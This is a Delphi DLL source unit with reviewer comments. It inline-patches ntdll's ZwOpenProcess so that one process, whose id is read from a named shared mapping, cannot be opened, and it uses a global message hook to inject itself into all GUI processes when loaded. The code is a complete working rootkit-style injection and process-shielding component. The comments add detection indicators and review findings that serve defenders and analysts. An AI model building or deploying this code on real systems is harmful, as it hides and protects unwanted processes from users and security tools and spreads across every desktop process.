// Writes the bytes saved in OldFunc back over the start of the routine PFunc
// points to, removing the patch installed by SetHook.
// INVALID_HANDLE_VALUE has the same numeric value as the current-process
// pseudo-handle, so the write targets this process's own address space.
// NOTE(review): the BOOL result of WriteProcessMemory is ignored, so a failed
// restore leaves the patch in place with no indication.
// NOTE(review): PFunc, OldFunc and b are declared outside this view; presumably
// b receives the byte count written - confirm against the declarations.
procedure UnHook;
begin
WriteProcessMemory(INVALID_HANDLE_VALUE,PFunc,@OldFunc,sizeof(Oldcode),b);
end;
// Calls the unpatched ZwOpenProcess on behalf of the filter routine:
//   1. restore the saved original bytes at PFunc,
//   2. call ZwOpenProcess with the caller's arguments,
//   3. write the NewFunc patch back.
// Returns the NTSTATUS produced by the real call.
// NOTE(review): steps 1-3 are not synchronised. Any other thread entering
// ZwOpenProcess during this window either runs unfiltered or may execute a
// partially written prologue, which is a stability risk for the host process.
// NOTE(review): the restore uses sizeof(Oldcode) and the re-patch uses
// sizeof(far_jmp); both types are declared outside this view - confirm they
// have the same size, otherwise the restore is short or overruns.
// NOTE(review): none of the WriteProcessMemory results are checked.
Function TrueZwOpenProcess(phProcess:PDWORD; AccessMask:DWORD;ObjectAttributes:PObjectAttributes;
ClientID:PClientID):NTStatus;stdcall;
begin
// Step 1: put the original prologue back so the call below reaches real code.
WriteProcessMemory(INVALID_HANDLE_VALUE,PFunc,@OldFunc,sizeof(Oldcode),b);
// Step 2: forward the request unchanged.
Result:= ZwOpenProcess(phProcess,AccessMask,ObjectAttributes,ClientID);
// Step 3: re-apply the redirect.
WriteProcessMemory(INVALID_HANDLE_VALUE,PFunc,@NewFunc,sizeof(far_jmp),b);
end;
// Replacement routine that the patched ZwOpenProcess prologue redirects to.
// A request whose ClientID names the process id stored in the global `pid`
// is answered with STATUS_ACCESS_DENIED without reaching the real routine;
// every other request is forwarded through TrueZwOpenProcess.
//
// Parameters mirror ZwOpenProcess: phProcess receives the handle, AccessMask
// is the requested access, ObjectAttributes and ClientID identify the target.
// Returns the NTSTATUS for the request.
//
// NOTE(review): this filter exists only inside processes that have this
// module loaded and only on this one export, so it is not a security
// boundary. When triaging a host, a process that cannot be opened from
// user-mode tools while ntdll shows a patched prologue is a strong signal
// that a module like this one is present.
// NOTE(review): ClientID is dereferenced after a nil check only; an invalid
// non-nil pointer from the caller faults here instead of producing an
// NTSTATUS error from the real routine.
Function NewZwOpenProcess(phProcess:PDWORD;AccessMask:DWORD;ObjectAttributes:PObjectAttributes;
ClientID:PClientID):NTStatus;stdcall;
begin
  // Relies on short-circuit evaluation: the field is read only when ClientID
  // is non-nil, exactly as in an "and"-style guard.
  if (ClientID = nil) or (ClientID.UniqueProcess <> pid) then
    Result := TrueZwOpenProcess(phProcess, AccessMask, ObjectAttributes, ClientID)
  else
    Result := STATUS_ACCESS_DENIED;
end;
// Patches the start of ntdll!ZwOpenProcess in the current process so that
// calls are redirected to NewZwOpenProcess.
//   - PFunc   : address of the export, resolved at run time.
//   - OldFunc : copy of the original leading bytes, kept for UnHook and
//               TrueZwOpenProcess.
//   - NewFunc : the redirect stub: opcode $68 (push imm32), the address of
//               NewZwOpenProcess, opcode $C3 (ret).
// The stub pushes a 32-bit address, so this only makes sense in a 32-bit
// process.
// NOTE(review): assumes far_jmp is a packed record of byte / pointer / byte;
// the declaration is outside this view - confirm.
// NOTE(review): neither GetModuleHandle/GetProcAddress nor the memory calls
// are checked; if the export is not found PFunc is nil and the following
// read and write fail without any indication.
// Detection note: after this runs, the in-memory prologue of ZwOpenProcess
// starts with 68 xx xx xx xx C3 and no longer matches the ntdll.dll image on
// disk; comparing loaded ntdll code against the file exposes the patch.
procedure SetHook;
begin
PFunc:=GetProcAddress(GetModuleHandle('ntdll.dll'),'ZwOpenProcess');
// Save the original bytes before they are overwritten.
ReadProcessMemory(INVALID_HANDLE_VALUE,PFunc,@OldFunc,sizeof(oldcode),b);
NewFunc.push:=$68;
NewFunc.PProc:=@NewZwOpenProcess;
NewFunc.ret:=$C3;
// INVALID_HANDLE_VALUE equals the current-process pseudo-handle value.
WriteProcessMemory(INVALID_HANDLE_VALUE,PFunc,@NewFunc,sizeof(far_jmp),b);
end;
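// WH_GETMESSAGE hook procedure. It does no work of its own: it passes the
// notification to the next hook in the chain and returns that hook's result.
//
// Parameters follow the Win32 hook-procedure contract (code, wParam, lParam).
// Returns the value produced by CallNextHookEx.
//
// The function result must be assigned: without the assignment the caller
// receives whatever happens to be left in the return register.
// NOTE(review): wParam is declared as `word` (16 bits) while the Win32
// WPARAM is wider; the value is narrowed before being passed on. The
// signature is left unchanged here - confirm whether that is intended.
function MessageProc(code : integer; wParam : word; lParam : longint) : longint; stdcall;
begin
  Result := CallNextHookEx(0, code, wParam, lParam);
end;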
// Thread body started by SetGlobalHook. Installs a WH_GETMESSAGE hook with
// thread id 0 and this module's HInstance, then blocks forever so the
// installing thread stays alive.
// With thread id 0 and a module handle, Windows loads this module into other
// processes on the desktop when they retrieve messages; each load runs the
// unit's initialisation code again in that process.
// Detection note: the side effect visible to a defender is this module
// appearing in the module list of unrelated GUI processes.
// NOTE(review): the hook handle returned by SetWindowsHookEx is discarded, so
// failure is not detected and the hook is never removed with
// UnhookWindowsHookEx.
// NOTE(review): this routine is passed to CreateThread but does not have the
// thread-start signature; it never returns, so the mismatch is presumably
// never exercised - confirm.
procedure SetGlobalHookProc();
begin
SetWindowsHookEx(WH_GETMESSAGE, @MessageProc, HInstance, 0);
Sleep(INFINITE)
end;
// Starts the hook-installing thread once per session, using a named mutex as
// the "already running" marker.
// CreateMutex is called first; if GetLastError then reports anything other
// than 0 (for example because the mutex already exists) the handle is closed
// and nothing else happens. Otherwise a thread running SetGlobalHookProc is
// created and the mutex handle is kept open.
// Detection note: the mutex name below is a fixed string and can serve as a
// host indicator for this module.
// NOTE(review): the thread handle returned by CreateThread is never closed.
// NOTE(review): the mutex handle is stored in a dword, not a THandle.
procedure SetGlobalHook();
var
  guard: dword;
  threadId: dword;
begin
  guard := CreateMutex(nil, false, '[{AD6A3658-0AB1-4C9D-93BA-44A06707C676}]');
  if GetLastError <> 0 then
  begin
    // Another instance owns the marker (or creation failed): back out.
    CloseHandle(guard);
    exit;
  end;
  CreateThread(nil, 0, @SetGlobalHookProc, nil, 0, threadId);
end;
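// Reads the process id to be filtered from the named file mapping 'lamecame'
// and stores it in the global `pid`.
// The mapping is opened read-only, 8 bytes are mapped, and the first DWORD is
// taken as the id.
//
// If the mapping cannot be opened or mapped, `pid` is left unchanged. This
// code runs during module initialisation, so dereferencing a nil view here
// would fault inside every process the module is loaded into.
//
// NOTE(review): the value comes from a named shared object and is trusted as
// is; whoever creates a mapping with this name first controls it.
// Detection note: the mapping name is a fixed string and can serve as a host
// indicator for this module.
procedure GetPID;
var
  map: THandle;
  addrmap: PDWORD;
begin
  map := OpenFileMapping(FILE_MAP_READ, false, 'lamecame');
  if map = 0 then
    exit; // mapping not present: nothing to read

  addrmap := MapViewOfFile(map, FILE_MAP_READ, 0, 0, 8);
  if addrmap <> nil then
  begin
    pid := addrmap^;
    UnMapViewOfFile(addrmap);
  end;

  CloseHandle(map);
end;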
// Module notification handler installed through DllProc.
//   DLL_PROCESS_ATTACH : read the target process id, patch ZwOpenProcess,
//                        then start the global message hook.
//   DLL_PROCESS_DETACH : restore the original ZwOpenProcess bytes.
// Any other reason code is ignored.
// NOTE(review): all of this runs from module initialisation, i.e. while the
// loader is still processing the load; the thread created by SetGlobalHook
// presumably does not start running until that finishes - confirm.
procedure DLLEntryPoint(dwReason: DWord);
begin
  if dwReason = DLL_PROCESS_ATTACH then
  begin
    GetPID;
    SetHook;
    SetGlobalHook;
  end
  else if dwReason = DLL_PROCESS_DETACH then
    UnHook;
end;
// Unit initialisation, executed when the module is loaded into a process.
begin
// Register the handler so later notifications (including detach) reach it.
DllProc:= @DLLEntryPoint;
// Run the attach path explicitly for this load; this is where the ntdll
// patch and the global hook get installed in the loading process.
DLLEntryPoint(DLL_PROCESS_ATTACH);
end.